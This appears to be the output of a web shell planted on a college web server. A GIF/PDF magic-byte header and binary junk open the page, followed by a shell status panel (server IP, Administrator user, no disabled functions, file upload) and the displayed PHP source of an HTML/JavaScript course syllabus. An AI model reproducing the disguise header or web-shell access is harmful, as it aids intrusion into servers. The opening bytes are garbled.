GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/CST1022/ |
Upload File : |
<? // JimMartinson/MMDT1021/Syllabus.php $TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n"; ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path. include('application.phpinc'); include('Course/courseInfo.phpinc'); include('classInfo.phpinc'); $title = "Syllabus"; $headTitle = '_CST_ - '.$courseNumber.' '.$courseTitle.' - '.$title; $pageTitle = $courseNumber.' '.$courseTitle.'<br>'.$title; $pageMenu = 'Course/courseMenu.phpinc'; include('common/pageHeader.phpinc'); $sectionTitle = $courseNumber.' '.$courseTitle.' - '.$title; include('common/sectionHeader.phpinc'); ?> <p> <fieldset><legend>Description</legend> This course covers advanced topics in the use of the Hyper Text Markup Language (HTML). Students will develop the skills they need to create forms for data entry, embed multimedia, use cascading style sheets for printing, and the use of JavaScript to enhance page function. Javascript code will be written by hand and then debugged and managed using Macromedia Dreamweaver. <br> (Prerequisites: CST/MMDT1021) (<?=$class['credits']?> Credits) (<?=$class['credits']?> Lecture, 0 Lab, 0 On the Job Training.) </fieldset> <fieldset><legend>Objectives</legend> <ol class="obj"> <li>Create a style sheet for printing.</li> <li>Create a website using frames.</li> <li>Create a web form and set form variables and form action.</li> <li>Use JavaScript to write text to the browser window.</li> <li>Use JavaScript to create pop ups and alerts based on mouse clicks.</li> <li>Using JavaScript prompt method, capture data entry.</li> <li>Create loops and decision structures.</li> <li>Perform calculations using JavaScript math operations.</li> <li>Create a CSS rollover menu system.</li> <li>Create a cycling banner.</li> <li>Build a wraparound slideshow.</li> <li>Perform form input validation.</li> <li>Capture keystrokes and perform actions based on those keystrokes.</li> <li>Create and read website cookies.</li> <li>Create external scripts.</li> <li>Use a third party API.</li> </ol> </fieldset> <? include('ReferencesResources.phpinc'); ?> <fieldset><legend>Requirements</legend> An average student will spend <?=$class['totalHours']?> hours performing course tasks: <? if ($class['lectureHours'] != 0) { ?><?=$class['lectureHours']?> hours of lecture<?=$lectureHoursPunctuation?><? } ?> <? if ($class['labHours'] != 0) { ?><?=$class['labHours']?> hours working on assigned tasks in the lab<?=$labHoursPunctuation?><? } ?> <? if ($class['lectureHours'] == 0 && $class['labHours'] == 0) { ?>No class hours, <? } ?> <? if ($class['outsideHours'] != 0) { ?><?=$class['outsideHours']?> hours out-of-class<? } ?> . Factual information is provided through informal presentation or in a personalized format. The student is expected to contact the instructor if difficulty is encountered or help is needed. <? if ($class['lectureHours'] != 0 || $class['labHours'] != 0) { ?> Attendance is critical for completion of the lab credits.<? } ?> </fieldset> <fieldset><legend>Grading</legend> Assignment and quiz grades are totaled and translated to a percentage and the percentages to grades. A score of 70% is passing. The following percentage distribution guarantees the following grade: A:93%+, A-:90%+, B+:87%+, B:83%+, B-:80%+, C+:77%+, C:73%+, C-:70%+, F:<70%. </fieldset> </p> <? include('Course/DisabilityNotice.phpinc'); include('common/sectionFooter.phpinc'); include('common/pageFooter.phpinc'); ?>